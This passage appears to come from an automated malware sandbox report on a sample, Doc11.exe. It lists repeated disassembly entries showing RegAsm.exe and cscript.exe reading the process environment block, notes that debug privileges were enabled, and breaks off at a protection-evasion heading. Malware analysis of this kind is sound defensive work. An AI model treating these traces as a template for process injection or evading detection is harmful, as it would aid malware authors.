Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315BC2C mov eax, dword ptr fs:[00000030h] 2_2_0315BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031BC450 mov eax, dword ptr fs:[00000030h] 2_2_031BC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031BC450 mov eax, dword ptr fs:[00000030h] 2_2_031BC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315A44B mov eax, dword ptr fs:[00000030h] 2_2_0315A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314746D mov eax, dword ptr fs:[00000030h] 2_2_0314746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313849B mov eax, dword ptr fs:[00000030h] 2_2_0313849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8CD6 mov eax, dword ptr fs:[00000030h] 2_2_031F8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E14FB mov eax, dword ptr fs:[00000030h] 2_2_031E14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8CD6 mov eax, dword ptr fs:[00000030h] 6_2_04CB8CD6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF849B mov eax, dword ptr fs:[00000030h] 6_2_04BF849B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA14FB mov eax, dword ptr fs:[00000030h] 6_2_04CA14FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A44B mov eax, dword ptr fs:[00000030h] 6_2_04C1A44B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7C450 mov eax, dword ptr fs:[00000030h] 6_2_04C7C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7C450 mov eax, dword ptr fs:[00000030h] 6_2_04C7C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0746D mov eax, dword ptr fs:[00000030h] 6_2_04C0746D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1BC2C mov eax, dword ptr fs:[00000030h] 6_2_04C1BC2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov ecx, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C98DF1 mov eax, dword ptr fs:[00000030h] 6_2_04C98DF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1FD9B mov eax, dword ptr fs:[00000030h] 6_2_04C1FD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1FD9B mov eax, dword ptr fs:[00000030h] 6_2_04C1FD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 mov eax, dword ptr fs:[00000030h] 6_2_04BFD5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 mov eax, dword ptr fs:[00000030h] 6_2_04BFD5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C135A1 mov eax, dword ptr fs:[00000030h] 6_2_04C135A1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB05AC mov eax, dword ptr fs:[00000030h] 6_2_04CB05AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB05AC mov eax, dword ptr fs:[00000030h] 6_2_04CB05AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C23D43 mov eax, dword ptr fs:[00000030h] 6_2_04C23D43
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C63540 mov eax, dword ptr fs:[00000030h] 6_2_04C63540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C93D40 mov eax, dword ptr fs:[00000030h] 6_2_04C93D40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEAD30 mov eax, dword ptr fs:[00000030h] 6_2_04BEAD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C07D50 mov eax, dword ptr fs:[00000030h] 6_2_04C07D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0C577 mov eax, dword ptr fs:[00000030h] 6_2_04C0C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0C577 mov eax, dword ptr fs:[00000030h] 6_2_04C0C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C6A537 mov eax, dword ptr fs:[00000030h] 6_2_04C6A537
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAE539 mov eax, dword ptr fs:[00000030h] 6_2_04CAE539
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8D34 mov eax, dword ptr fs:[00000030h] 6_2_04CB8D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C28EC7 mov eax, dword ptr fs:[00000030h] 6_2_04C28EC7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FEC0 mov eax, dword ptr fs:[00000030h] 6_2_04C9FEC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C136CC mov eax, dword ptr fs:[00000030h] 6_2_04C136CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8ED6 mov eax, dword ptr fs:[00000030h] 6_2_04CB8ED6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C116E0 mov ecx, dword ptr fs:[00000030h] 6_2_04C116E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7FE87 mov eax, dword ptr fs:[00000030h] 6_2_04C7FE87
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF76E2 mov eax, dword ptr fs:[00000030h] 6_2_04BF76E2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C646A7 mov eax, dword ptr fs:[00000030h] 6_2_04C646A7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAAE44 mov eax, dword ptr fs:[00000030h] 6_2_04CAAE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAAE44 mov eax, dword ptr fs:[00000030h] 6_2_04CAAE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEE620 mov eax, dword ptr fs:[00000030h] 6_2_04BEE620
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C18E00 mov eax, dword ptr fs:[00000030h] 6_2_04C18E00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1608 mov eax, dword ptr fs:[00000030h] 6_2_04CA1608
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF766D mov eax, dword ptr fs:[00000030h] 6_2_04BF766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A61C mov eax, dword ptr fs:[00000030h] 6_2_04C1A61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A61C mov eax, dword ptr fs:[00000030h] 6_2_04C1A61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FE3F mov eax, dword ptr fs:[00000030h] 6_2_04C9FE3F
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Doc11.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion: